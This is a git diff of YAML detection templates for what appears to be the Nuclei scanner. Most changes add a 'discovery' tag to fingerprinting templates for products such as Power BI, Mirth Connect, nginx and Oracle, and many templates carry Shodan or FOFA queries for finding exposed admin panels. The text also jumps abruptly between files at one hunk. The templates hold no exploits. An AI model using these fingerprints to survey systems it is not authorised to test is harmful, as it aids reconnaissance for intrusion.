"{{BaseURL}}/reports/browse" - - stop-at-first-match: true - redirects: true - max-redirects: 2 - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains_any(to_lower(body), "power bi report server", "powerbireportserver", "<title>report server web portal")' - condition: and - - extractors: - - type: json - part: body - name: version - json: +id: powerbi-report-server-detect + +info: + name: PowerBI Report Server - Detect + author: righettod + severity: info + description: | + PowerBI Report Server was detected. + reference: + - https://www.microsoft.com/en-us/power-platform/products/power-bi/report-server + metadata: + max-request: 1 + verified: true + shodan-query: http.html:"report server web portal" + tags: panel,powerbi,detect,discovery + +http: + - method: GET + path: + - "{{BaseURL}}/reports/api/v2.0/System" + - "{{BaseURL}}/reports/browse" + + stop-at-first-match: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), "power bi report server", "powerbireportserver", "report server web portal")' + condition: and + + extractors: + - type: json + part: body + name: version + json: - '.ProductVersion' # digest: 4b0a00483046022100963a3aaeddef177ab6689e418767597561df9e2a0a9ac07036bb62cbc7886f4c022100ac8ecadca0431fcf1128eff647ed4fc20854ca874f5b2ce20badf75145e2a5c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/microsoft/sql-server-reporting.yaml b/http/technologies/microsoft/sql-server-reporting.yaml index 31e59ed0c3d..1c38cc5b7a0 100644 --- a/http/technologies/microsoft/sql-server-reporting.yaml +++ b/http/technologies/microsoft/sql-server-reporting.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: tech,microsoft + tags: tech,microsoft,discovery http: - method: GET diff --git a/http/technologies/microstrategy-detect.yaml b/http/technologies/microstrategy-detect.yaml index 79da49875d1..775c765d71b 100644 --- a/http/technologies/microstrategy-detect.yaml +++ b/http/technologies/microstrategy-detect.yaml @@ -7,7 +7,7 @@ info: description: Detect if MicroStrategy instances exist in your URLS metadata: max-request: 16 - tags: microstrategy,panel,tech + tags: microstrategy,panel,tech,discovery http: - method: GET diff --git a/http/technologies/microweber-detect.yaml b/http/technologies/microweber-detect.yaml index 4fdc454e162..1c6d12a6fdf 100644 --- a/http/technologies/microweber-detect.yaml +++ b/http/technologies/microweber-detect.yaml @@ -16,7 +16,7 @@ info: fofa-query: - icon_hash=780351152 - body="microweber" - tags: tech,microweber,oss + tags: tech,microweber,oss,discovery http: - method: GET diff --git a/http/technologies/mikrotik-httpproxy.yaml b/http/technologies/mikrotik-httpproxy.yaml index fc86cca8566..1ccd4cedcb8 100644 --- a/http/technologies/mikrotik-httpproxy.yaml +++ b/http/technologies/mikrotik-httpproxy.yaml @@ -12,7 +12,7 @@ info: vendor: mikrotik product: rb3011uias-rm shodan-query: 'Server: mikrotik httpproxy' - tags: tech,mikrotik + tags: tech,mikrotik,discovery http: - method: GET diff --git a/http/technologies/milvus-detect.yaml b/http/technologies/milvus-detect.yaml index c6714203737..582ef8024fd 100644 --- a/http/technologies/milvus-detect.yaml +++ b/http/technologies/milvus-detect.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 fofa-query: title="Milvus" - tags: tech,vector-database,milvus,detect + tags: tech,vector-database,milvus,detect,discovery http: - method: GET diff --git a/http/technologies/mirth-connect-detect.yaml b/http/technologies/mirth-connect-detect.yaml index 1c22a98a81c..081b88ff2eb 100644 --- a/http/technologies/mirth-connect-detect.yaml +++ b/http/technologies/mirth-connect-detect.yaml @@ -1,31 +1,31 @@ -id: mirth-connect-detect - -info: - name: Mirth Connect Admin Panel - Detect - author: rxerium - severity: info - description: | - Detects Mirth Connect Administrator panel. - metadata: - verified: true - max-request: 1 - product: mirth_connect - shodan-query: title:"mirth connect administrator" - tags: mirth-connect,tech,detect - -http: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Mirth Connect Administrator" - - - type: status - status: +id: mirth-connect-detect + +info: + name: Mirth Connect Admin Panel - Detect + author: rxerium + severity: info + description: | + Detects Mirth Connect Administrator panel. + metadata: + verified: true + max-request: 1 + product: mirth_connect + shodan-query: title:"mirth connect administrator" + tags: mirth-connect,tech,detect,discovery + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Mirth Connect Administrator" + + - type: status + status: - 200 # digest: 4a0a004730450220709d87f2ff21860e9c1019838a7ee977f83edcc4c18eeebf52aafaad36e06772022100d76792e316db913503a7d12f614e591afdc4af59218eb5d1b7c46630b77af4aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/mitel-version-detect.yaml b/http/technologies/mitel-version-detect.yaml index fbac94edea7..fb6cc468a9a 100644 --- a/http/technologies/mitel-version-detect.yaml +++ b/http/technologies/mitel-version-detect.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: html:"MiCollab End User Portal" - tags: mitel,micollab,ucs,version,detect + tags: mitel,micollab,ucs,version,detect,discovery http: - method: GET diff --git a/http/technologies/moinmoin-detect.yaml b/http/technologies/moinmoin-detect.yaml index 8e0ae3c0a4c..c87fa1cb1ce 100644 --- a/http/technologies/moinmoin-detect.yaml +++ b/http/technologies/moinmoin-detect.yaml @@ -9,7 +9,7 @@ info: - https://github.com/moinwiki/moin-1.9 metadata: max-request: 1 - tags: tech,moin,moinmoin,wiki + tags: tech,moin,moinmoin,wiki,discovery http: - method: GET diff --git a/http/technologies/mojoportal-detect.yaml b/http/technologies/mojoportal-detect.yaml index e34a1edaeaa..f0701c1b1a2 100644 --- a/http/technologies/mojoportal-detect.yaml +++ b/http/technologies/mojoportal-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: tech,mojoportal + tags: tech,mojoportal,discovery http: - method: GET diff --git a/http/technologies/mongoose-server.yaml b/http/technologies/mongoose-server.yaml index d2f50ed563d..91ca647d227 100644 --- a/http/technologies/mongoose-server.yaml +++ b/http/technologies/mongoose-server.yaml @@ -16,7 +16,7 @@ info: vendor: cesanta product: mongoose shodan-query: 'Server: Mongoose' - tags: tech,mongoose + tags: tech,mongoose,discovery http: - method: GET diff --git a/http/technologies/monstracms-detect.yaml b/http/technologies/monstracms-detect.yaml index ab2ac36a15e..f8a54ec8f90 100644 --- a/http/technologies/monstracms-detect.yaml +++ b/http/technologies/monstracms-detect.yaml @@ -13,7 +13,7 @@ info: product: monstra_cms vendor: monstra fofa-query: icon_hash=419828698 - tags: tech,monstra,monstracms + tags: tech,monstra,monstracms,discovery http: - method: GET diff --git a/http/technologies/moveit-transfer-detect.yaml b/http/technologies/moveit-transfer-detect.yaml index 85b9ad001b9..09564e6b3f1 100644 --- a/http/technologies/moveit-transfer-detect.yaml +++ b/http/technologies/moveit-transfer-detect.yaml @@ -12,7 +12,7 @@ info: vendor: progress product: moveit_transfer shodan-query: html:"human.aspx" - tags: tech,moveit + tags: tech,moveit,discovery http: - method: GET diff --git a/http/technologies/mrtg-detect.yaml b/http/technologies/mrtg-detect.yaml index aac20d1d3aa..e8cf6491d51 100644 --- a/http/technologies/mrtg-detect.yaml +++ b/http/technologies/mrtg-detect.yaml @@ -9,7 +9,7 @@ info: - https://oss.oetiker.ch/mrtg/ metadata: max-request: 3 - tags: tech,mrtg + tags: tech,mrtg,discovery http: - method: GET diff --git a/http/technologies/nacos-version.yaml b/http/technologies/nacos-version.yaml index f53f7b1edff..24015d81413 100644 --- a/http/technologies/nacos-version.yaml +++ b/http/technologies/nacos-version.yaml @@ -16,7 +16,7 @@ info: shodan-query: title:"Nacos" product: nacos vendor: alibaba - tags: tech,detect,nacos + tags: tech,detect,nacos,discovery http: - method: GET diff --git a/http/technologies/neo4j-neodash-detect.yaml b/http/technologies/neo4j-neodash-detect.yaml index 6a25d3ae1fc..20dbbadf654 100644 --- a/http/technologies/neo4j-neodash-detect.yaml +++ b/http/technologies/neo4j-neodash-detect.yaml @@ -14,7 +14,7 @@ info: vendor: neo4j product: neodash shodan-query: title:"NeoDash" - tags: tech,neodash,neo4j,detect + tags: tech,neodash,neo4j,detect,discovery http: - method: GET diff --git a/http/technologies/neos-detect.yaml b/http/technologies/neos-detect.yaml index 5fcc745b32c..89efcbe13b6 100644 --- a/http/technologies/neos-detect.yaml +++ b/http/technologies/neos-detect.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: tech,neos,cms + tags: tech,neos,cms,discovery http: - method: GET diff --git a/http/technologies/nethermind-server-detect.yaml b/http/technologies/nethermind-server-detect.yaml index b81163ad095..8b929f33344 100644 --- a/http/technologies/nethermind-server-detect.yaml +++ b/http/technologies/nethermind-server-detect.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 1 shodan-query: product:"Nethermind" - tags: tech,nethermind,ethereum,web3,blockchain + tags: tech,nethermind,ethereum,web3,blockchain,discovery http: - raw: diff --git a/http/technologies/netsweeper-webadmin-detect.yaml b/http/technologies/netsweeper-webadmin-detect.yaml index 47ca13e1265..7a16bf20dd5 100644 --- a/http/technologies/netsweeper-webadmin-detect.yaml +++ b/http/technologies/netsweeper-webadmin-detect.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 2 - tags: tech,netsweeper,webadmin + tags: tech,netsweeper,webadmin,discovery http: - method: GET diff --git a/http/technologies/nextchat-detect.yaml b/http/technologies/nextchat-detect.yaml index a348b1028d0..86e54a7bfdd 100644 --- a/http/technologies/nextchat-detect.yaml +++ b/http/technologies/nextchat-detect.yaml @@ -13,7 +13,7 @@ info: max-request: 1 shodan-query: title:"NextChat" fofa-query: title="NextChat" - tags: tech,chatgpt,nextchat,detect + tags: tech,chatgpt,nextchat,detect,discovery http: - method: GET diff --git a/http/technologies/nextcloud-detect.yaml b/http/technologies/nextcloud-detect.yaml index 51358cf49e2..434219c8097 100644 --- a/http/technologies/nextcloud-detect.yaml +++ b/http/technologies/nextcloud-detect.yaml @@ -16,7 +16,7 @@ info: vendor: nextcloud product: nextcloud_server shodan-query: http.title:"Nextcloud" - tags: tech,nextcloud,storage + tags: tech,nextcloud,storage,discovery http: - method: GET diff --git a/http/technologies/nextcloud-owncloud-detect.yaml b/http/technologies/nextcloud-owncloud-detect.yaml index c6418044c00..5a103c3fe19 100644 --- a/http/technologies/nextcloud-owncloud-detect.yaml +++ b/http/technologies/nextcloud-owncloud-detect.yaml @@ -12,7 +12,7 @@ info: vendor: owncloud product: owncloud shodan-query: http.html:"owncloud" - tags: tech,owncloud,status + tags: tech,owncloud,status,discovery http: - method: GET diff --git a/http/technologies/nexus-detect.yaml b/http/technologies/nexus-detect.yaml index a418f9ab460..1782e1d27d0 100644 --- a/http/technologies/nexus-detect.yaml +++ b/http/technologies/nexus-detect.yaml @@ -14,7 +14,7 @@ info: vendor: sonatype product: nexus_repository_manager shodan-query: http.html:"Nexus Repository Manager" - tags: tech,nexus + tags: tech,nexus,discovery http: - method: GET diff --git a/http/technologies/nginx/default-nginx-page.yaml b/http/technologies/nginx/default-nginx-page.yaml index 2f70650a70c..634fcecac8c 100644 --- a/http/technologies/nginx/default-nginx-page.yaml +++ b/http/technologies/nginx/default-nginx-page.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Welcome to nginx!" - tags: tech,nginx + tags: tech,nginx,discovery http: - method: GET diff --git a/http/technologies/nginx/nginx-linux-page.yaml b/http/technologies/nginx/nginx-linux-page.yaml index c2178b11a6f..3c73542552d 100644 --- a/http/technologies/nginx/nginx-linux-page.yaml +++ b/http/technologies/nginx/nginx-linux-page.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Test Page for the Nginx HTTP Server on Amazon Linux" - tags: tech,nginx,amazon + tags: tech,nginx,amazon,discovery http: - method: GET diff --git a/http/technologies/nginx/nginx-version.yaml b/http/technologies/nginx/nginx-version.yaml index 8e04e6efead..765153b0a1a 100644 --- a/http/technologies/nginx/nginx-version.yaml +++ b/http/technologies/nginx/nginx-version.yaml @@ -7,7 +7,7 @@ info: description: Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets. metadata: max-request: 1 - tags: tech,nginx + tags: tech,nginx,discovery http: - method: GET diff --git a/http/technologies/nifi-detech.yaml b/http/technologies/nifi-detech.yaml index 8b214026f74..8560044d216 100644 --- a/http/technologies/nifi-detech.yaml +++ b/http/technologies/nifi-detech.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 7 - tags: tech,apache,nifi + tags: tech,apache,nifi,discovery http: - method: GET diff --git a/http/technologies/nimplant-c2.yaml b/http/technologies/nimplant-c2.yaml index 478308eef61..25cb7f14cc0 100644 --- a/http/technologies/nimplant-c2.yaml +++ b/http/technologies/nimplant-c2.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: "nimplant C2 server" - tags: tech,nimplant,c2 + tags: tech,nimplant,c2,discovery http: - method: GET diff --git a/http/technologies/nimsoft-wasp.yaml b/http/technologies/nimsoft-wasp.yaml index c5e1d4745fa..cb0fddf02f1 100644 --- a/http/technologies/nimsoft-wasp.yaml +++ b/http/technologies/nimsoft-wasp.yaml @@ -7,7 +7,7 @@ info: description: Detect Nimsoft Wasp WebPage metadata: max-request: 1 - tags: nimsoft,exposure,tech + tags: nimsoft,exposure,tech,discovery http: - method: GET diff --git a/http/technologies/nocobase-detect.yaml b/http/technologies/nocobase-detect.yaml index 8b181b7936c..a83793bcc5f 100644 --- a/http/technologies/nocobase-detect.yaml +++ b/http/technologies/nocobase-detect.yaml @@ -11,7 +11,7 @@ info: max-request: 1 fofa-query: body="__nocobase_public_path__" zoomeye-query: app="NocoBase" - tags: tech,nocobase,detect + tags: tech,nocobase,detect,discovery http: - method: GET diff --git a/http/technologies/node-red-detect.yaml b/http/technologies/node-red-detect.yaml index a1221b3d6d7..52030e9237e 100644 --- a/http/technologies/node-red-detect.yaml +++ b/http/technologies/node-red-detect.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: tech,apache,node-red-dashboard + tags: tech,apache,node-red-dashboard,discovery http: - method: GET diff --git a/http/technologies/notion-detect.yaml b/http/technologies/notion-detect.yaml index 833d8a6fa99..71a2d3849fb 100644 --- a/http/technologies/notion-detect.yaml +++ b/http/technologies/notion-detect.yaml @@ -12,7 +12,7 @@ info: vendor: notion product: notion shodan-query: title:"Notion – One workspace. Every team." - tags: notion,tech + tags: notion,tech,discovery http: - method: GET diff --git a/http/technologies/nperf-server-detect.yaml b/http/technologies/nperf-server-detect.yaml index 4cf1f758605..6218ca6fb35 100644 --- a/http/technologies/nperf-server-detect.yaml +++ b/http/technologies/nperf-server-detect.yaml @@ -1,41 +1,41 @@ -id: nperf-server-detect - -info: - name: nPerf Server - Detect - author: rxerium - severity: info - description: | - A nperf panel was detected. - reference: - - https://www.nperf.com - metadata: - verified: true - max-request: 1 - shodan-query: product:"nPerf" - tags: tech,nperf,detect - -http: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: or - matchers: - - type: word - part: body - words: - - "nPerfServer" - - - type: word - part: header - words: - - "Nperfserver-Remote-Endpoint" - - "nPerf/" - condition: or - - extractors: - - type: kval - part: header - kval: +id: nperf-server-detect + +info: + name: nPerf Server - Detect + author: rxerium + severity: info + description: | + A nperf panel was detected. + reference: + - https://www.nperf.com + metadata: + verified: true + max-request: 1 + shodan-query: product:"nPerf" + tags: tech,nperf,detect,discovery + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: or + matchers: + - type: word + part: body + words: + - "nPerfServer" + + - type: word + part: header + words: + - "Nperfserver-Remote-Endpoint" + - "nPerf/" + condition: or + + extractors: + - type: kval + part: header + kval: - Server # digest: 490a004630440220089a893cad52546b448baef2b01d9920cd23b16f1b51fb405d3f2e765a77ae8602202c7dd321be22c08c0c6f5f949a9c02e977a406d1d7654a8d21e950e0c43f905d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/ntop-detect.yaml b/http/technologies/ntop-detect.yaml index c0d73466d39..1865fda8400 100644 --- a/http/technologies/ntop-detect.yaml +++ b/http/technologies/ntop-detect.yaml @@ -17,7 +17,7 @@ info: shodan-query: http.title:"welcome to ntop" product: ntopng vendor: ntop - tags: tech,ntop,panel + tags: tech,ntop,panel,discovery http: - method: GET diff --git a/http/technologies/nvidia-triton-detect.yaml b/http/technologies/nvidia-triton-detect.yaml index 631284f2d59..14de452471f 100644 --- a/http/technologies/nvidia-triton-detect.yaml +++ b/http/technologies/nvidia-triton-detect.yaml @@ -13,7 +13,7 @@ info: max-request: 1 vendor: nvidia product: triton - tags: oss,nvidia,triton,tech + tags: oss,nvidia,triton,tech,discovery http: - method: GET diff --git a/http/technologies/oauth2-detect.yaml b/http/technologies/oauth2-detect.yaml index b059d121358..1e7e0756192 100644 --- a/http/technologies/oauth2-detect.yaml +++ b/http/technologies/oauth2-detect.yaml @@ -7,7 +7,7 @@ info: description: Try to detect OAuth 2.0 Authorization Server via the "oauth/token" endpoint metadata: max-request: 1 - tags: tech,oauth + tags: tech,oauth,discovery http: - method: POST diff --git a/http/technologies/octobercms-detect.yaml b/http/technologies/octobercms-detect.yaml index 8edc8a1d48d..1694fcc14e5 100644 --- a/http/technologies/octobercms-detect.yaml +++ b/http/technologies/octobercms-detect.yaml @@ -9,7 +9,7 @@ info: - https://github.com/octobercms/october metadata: max-request: 2 - tags: tech,octobercms + tags: tech,octobercms,discovery http: - method: GET diff --git a/http/technologies/oidc-detect.yaml b/http/technologies/oidc-detect.yaml index 423c270a9e9..c0dfca0ffd3 100644 --- a/http/technologies/oidc-detect.yaml +++ b/http/technologies/oidc-detect.yaml @@ -7,7 +7,7 @@ info: description: Detects OpenID Connect providers. See https://en.wikipedia.org/wiki/OpenID_Connect metadata: max-request: 1 - tags: tech,oidc + tags: tech,oidc,discovery http: - method: GET diff --git a/http/technologies/olivetti-crf-detect.yaml b/http/technologies/olivetti-crf-detect.yaml index f07638f4d5f..9ab4d084d45 100644 --- a/http/technologies/olivetti-crf-detect.yaml +++ b/http/technologies/olivetti-crf-detect.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Olivetti CRF" - tags: tech,olivetti + tags: tech,olivetti,discovery http: - method: GET diff --git a/http/technologies/omni-commerce-connect-detect.yaml b/http/technologies/omni-commerce-connect-detect.yaml index 71f60f4c3da..38c45ac2310 100644 --- a/http/technologies/omni-commerce-connect-detect.yaml +++ b/http/technologies/omni-commerce-connect-detect.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 1 shodan-query: title:"Hybris" - tags: tech,sap,hybris,omni + tags: tech,sap,hybris,omni,discovery http: - method: GET diff --git a/http/technologies/oneblog-detect.yaml b/http/technologies/oneblog-detect.yaml index 4dc783c6bfe..2b7844d54a6 100644 --- a/http/technologies/oneblog-detect.yaml +++ b/http/technologies/oneblog-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: tech,oneblog + tags: tech,oneblog,discovery http: - method: GET diff --git a/http/technologies/open-journal-systems.yaml b/http/technologies/open-journal-systems.yaml index a2fd054999c..7efaeae6960 100644 --- a/http/technologies/open-journal-systems.yaml +++ b/http/technologies/open-journal-systems.yaml @@ -15,7 +15,7 @@ info: vendor: openjournalsystems product: open_journal_systems shodan-query: html:"Open Journal Systems" - tags: tech,ojs + tags: tech,ojs,discovery http: - method: GET diff --git a/http/technologies/open-virtualization-manager-detect.yaml b/http/technologies/open-virtualization-manager-detect.yaml index f62d1d97372..8ab31c1d1da 100644 --- a/http/technologies/open-virtualization-manager-detect.yaml +++ b/http/technologies/open-virtualization-manager-detect.yaml @@ -16,7 +16,7 @@ info: max-request: 1 shodan-query: title:"Ovirt-Engine" google-query: intitle:"Ovirt-Engine" - tags: tech,ovirt + tags: tech,ovirt,discovery http: - method: GET diff --git a/http/technologies/openai-plugin.yaml b/http/technologies/openai-plugin.yaml index a74e0bcfecd..7d7d3b44818 100644 --- a/http/technologies/openai-plugin.yaml +++ b/http/technologies/openai-plugin.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: tech,openai,plugin + tags: tech,openai,plugin,discovery http: - method: GET diff --git a/http/technologies/openarchives-detect.yaml b/http/technologies/openarchives-detect.yaml index f945dd0ff6c..72854ef337d 100644 --- a/http/technologies/openarchives-detect.yaml +++ b/http/technologies/openarchives-detect.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true shodan-query: http.html:"Welcome to Oracle Fusion Middleware" - - - type: status - status: +id: oracle-fusion-detect + +info: + name: Oracle Fusion Middleware - Detect + author: rxerium + severity: info + description: | + Oracle Fusion Middleware was detected. + metadata: + verified: true + max-request: 1 + shodan-query: http.html:"Welcome to Oracle Fusion Middleware" + tags: oracle,middleware,detect,tech,discovery + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Welcome to Oracle Fusion Middleware" + + - type: status + status: - 200 # digest: 4a0a00473045022100b1ee36e360c936debf6ac9e5d42539a3832bd7fc496a0546049f8b5c7f31eec3022048d25bfd8cbf000f7ad7d8232b38443e706f653eff75c7eceae85dd70dec98f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/oracle-httpserver-12c.yaml b/http/technologies/oracle-httpserver-12c.yaml index 0d378a9a350..e4ce44f9f40 100644 --- a/http/technologies/oracle-httpserver-12c.yaml +++ b/http/technologies/oracle-httpserver-12c.yaml @@ -8,7 +8,7 @@ info: verified: true max-request: 1 shodan-query: http.html:"Oracle HTTP Server" - tags: tech,oracle,httpserver + tags: tech,oracle,httpserver,discovery http: - method: GET diff --git a/http/technologies/oracle/default-oracle-application-page.yaml b/http/technologies/oracle/default-oracle-application-page.yaml index 003a976c433..20bd3a05e18 100644 --- a/http/technologies/oracle/default-oracle-application-page.yaml +++ b/http/technologies/oracle/default-oracle-application-page.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Oracle Application Server Containers" - tags: tech,oracle + tags: tech,oracle,discovery http: - method: GET diff --git a/http/technologies/oracle/oracle-access-manager-detect.yaml b/http/technologies/oracle/oracle-access-manager-detect.yaml index 9bde78e0f50..c3f3a3e7dde 100644 --- a/http/technologies/oracle/oracle-access-manager-detect.yaml +++ b/http/technologies/oracle/oracle-access-manager-detect.yaml @@ -7,7 +7,7 @@ info: metadata: verified: true max-request: 1 - tags: tech,oracle + tags: tech,oracle,discovery http: - method: GET diff --git a/http/technologies/oracle/oracle-atg-commerce.yaml b/http/technologies/oracle/oracle-atg-commerce.yaml index ccfe5f15f50..087863e9820 100644 --- a/http/technologies/oracle/oracle-atg-commerce.yaml +++ b/http/technologies/oracle/oracle-atg-commerce.yaml @@ -14,7 +14,7 @@ info: metadata: verified: true max-request: 1 - tags: tech,oracle,atg,commerce + tags: tech,oracle,atg,commerce,discovery http: - method: GET diff --git a/http/technologies/oracle/oracle-dbass-detect.yaml b/http/technologies/oracle/oracle-dbass-detect.yaml index 5276ad746c1..f1414184b4d 100644 --- a/http/technologies/oracle/oracle-dbass-detect.yaml +++ b/http/technologies/oracle/oracle-dbass-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: oracle,tech + tags: oracle,tech,discovery http: - method: GET diff --git a/http/technologies/oracle/oracle-dbcs.yaml b/http/technologies/oracle/oracle-dbcs.yaml index 611ce330a9b..41b3a54f3ff 100644 --- a/http/technologies/oracle/oracle-dbcs.yaml +++ b/http/technologies/oracle/oracle-dbcs.yaml @@ -11,7 +11,7 @@ info: vendor: oracle product: database_server shodan-query: http.title:"Oracle Database as a Service" - tags: oracle,tech + tags: oracle,tech,discovery http: - method: GET diff --git a/http/technologies/oracle/oracle-iplanet-web-server.yaml b/http/technologies/oracle/oracle-iplanet-web-server.yaml index 37236a37f3e..6728c3e4dfa 100644 --- a/http/technologies/oracle/oracle-iplanet-web-server.yaml +++ b/http/technologies/oracle/oracle-iplanet-web-server.yaml @@ -11,7 +11,7 @@ info: vendor: oracle product: iplanet_web_server fofa-query: app="Oracle-iPlanet-Web-Server - tags: tech,oracle + tags: tech,oracle,discovery http: - method: GET diff --git a/http/technologies/oracle/oracle-webcenter-sites.yaml b/http/technologies/oracle/oracle-webcenter-sites.yaml index d03e291aa4c..65840680e64 100644 --- a/http/technologies/oracle/oracle-webcenter-sites.yaml +++ b/http/technologies/oracle/oracle-webcenter-sites.yaml @@ -12,7 +12,7 @@ info: vendor: oracle product: webcenter_sites shodan-query: http.html:"WebCenter" - tags: tech,oracle,webcenter + tags: tech,oracle,webcenter,discovery http: - method: GET diff --git a/http/technologies/orbit-telephone-detect.yaml b/http/technologies/orbit-telephone-detect.yaml index 89e3306fb32..486808651ac 100644 --- a/http/technologies/orbit-telephone-detect.yaml +++ b/http/technologies/orbit-telephone-detect.yaml @@ -13,7 +13,7 @@ info: max-request: 1 shodan-query: html:"Orbit Telephone System" fofa-query: body="Orbit Telephone System" - tags: tech,detect + tags: tech,detect,discovery http: - method: GET diff --git a/http/technologies/osquery-fleet-detect.yaml b/http/technologies/osquery-fleet-detect.yaml index 0b4f0d902f6..fff39eb647e 100644 --- a/http/technologies/osquery-fleet-detect.yaml +++ b/http/technologies/osquery-fleet-detect.yaml @@ -17,7 +17,7 @@ info: shodan-query: http.favicon.hash:-1529860313 product: fleet vendor: kolide - tags: panel,fleet,osquery,tech + tags: panel,fleet,osquery,tech,discovery http: - method: GET diff --git a/http/technologies/owasp-juice-shop-detected.yaml b/http/technologies/owasp-juice-shop-detected.yaml index c72562980c9..67ff4dc6b5f 100644 --- a/http/technologies/owasp-juice-shop-detected.yaml +++ b/http/technologies/owasp-juice-shop-detected.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 fofa-query: title="OWASP Juice Shop" - tags: tech,owasp + tags: tech,owasp,discovery http: - method: GET diff --git a/http/technologies/pagespeed-detect.yaml b/http/technologies/pagespeed-detect.yaml index ec20c03bd1e..63e9d15dc26 100644 --- a/http/technologies/pagespeed-detect.yaml +++ b/http/technologies/pagespeed-detect.yaml @@ -8,7 +8,7 @@ info: verified: true max-request: 1 shodan-query: "X-Mod-Pagespeed:" - tags: tech,pagespeed + tags: tech,pagespeed,discovery http: - method: GET diff --git a/http/technologies/payara-micro-server-detect.yaml b/http/technologies/payara-micro-server-detect.yaml index ba0df0a0587..4847824be2f 100644 --- a/http/technologies/payara-micro-server-detect.yaml +++ b/http/technologies/payara-micro-server-detect.yaml @@ -12,7 +12,7 @@ info: vendor: payara product: payara shodan-query: 'title:"Payara Micro #badassfish - Error report"' - tags: tech,payara + tags: tech,payara,discovery http: - method: GET diff --git a/http/technologies/pbootcms-detect.yaml b/http/technologies/pbootcms-detect.yaml index 08db7b99fb0..97ace2e137c 100644 --- a/http/technologies/pbootcms-detect.yaml +++ b/http/technologies/pbootcms-detect.yaml @@ -14,7 +14,7 @@ info: vendor: pbootcms product: pbootcms shodan-query: http.html:"PbootCMS" - tags: tech,pbootcms + tags: tech,pbootcms,discovery http: - method: GET diff --git a/http/technologies/pega-detect.yaml b/http/technologies/pega-detect.yaml index cb4bdf4dec1..af51f5dcb56 100644 --- a/http/technologies/pega-detect.yaml +++ b/http/technologies/pega-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: tech,pega + tags: tech,pega,discovery http: - method: GET diff --git a/http/technologies/pexip-detect.yaml b/http/technologies/pexip-detect.yaml index 6eab11d6d2e..85e8ac50f9f 100644 --- a/http/technologies/pexip-detect.yaml +++ b/http/technologies/pexip-detect.yaml @@ -16,7 +16,7 @@ info: vendor: pexip product: pexip_infinity shodan-query: http.title:"Pexip Connect for Web" - tags: tech,pexip,detect + tags: tech,pexip,detect,discovery http: - method: GET diff --git a/http/technologies/pghero-detect.yaml b/http/technologies/pghero-detect.yaml index a017b926600..5999e5a1536 100644 --- a/http/technologies/pghero-detect.yaml +++ b/http/technologies/pghero-detect.yaml @@ -1,29 +1,29 @@ -id: pghero-detect - -info: - name: PgHero - Detect - author: righettod - severity: info - description: | - PgHero products was detected. - reference: - - https://github.com/ankane/pghero - metadata: - verified: true - max-request: 1 - shodan-query: http.title:"PgHero" - tags: tech,pghero,detect - -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains_any(to_lower(body), "<title>pghero", "/assets/pghero/", ">pghero</a>")' +id: pghero-detect + +info: + name: PgHero - Detect + author: righettod + severity: info + description: | + PgHero products was detected. + reference: + - https://github.com/ankane/pghero + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"PgHero" + tags: tech,pghero,detect,discovery + +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), "<title>pghero", "/assets/pghero/", ">pghero</a>")' condition: and # digest: 490a0046304402202d60a9a8a6d85699499351bf5a0f43308d31021428114f8d33d325043b768a3402200d429880a8cb548787f998df9959f1233821403b1208c9c23ab554d5dde2aa79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/php-detect.yaml b/http/technologies/php-detect.yaml index 5d4b75908fc..26c399d1130 100644 --- a/http/technologies/php-detect.yaml +++ b/http/technologies/php-detect.yaml @@ -12,7 +12,7 @@ info: vendor: php product: php shodan-query: "X-Powered-By: PHP" - tags: tech,php + tags: tech,php,discovery http: - method: GET diff --git a/http/technologies/php-fusion-detect.yaml b/http/technologies/php-fusion-detect.yaml index 21afa4ba316..611ce946c03 100644 --- a/http/technologies/php-fusion-detect.yaml +++ b/http/technologies/php-fusion-detect.yaml @@ -11,7 +11,7 @@ info: vendor: php-fusion product: 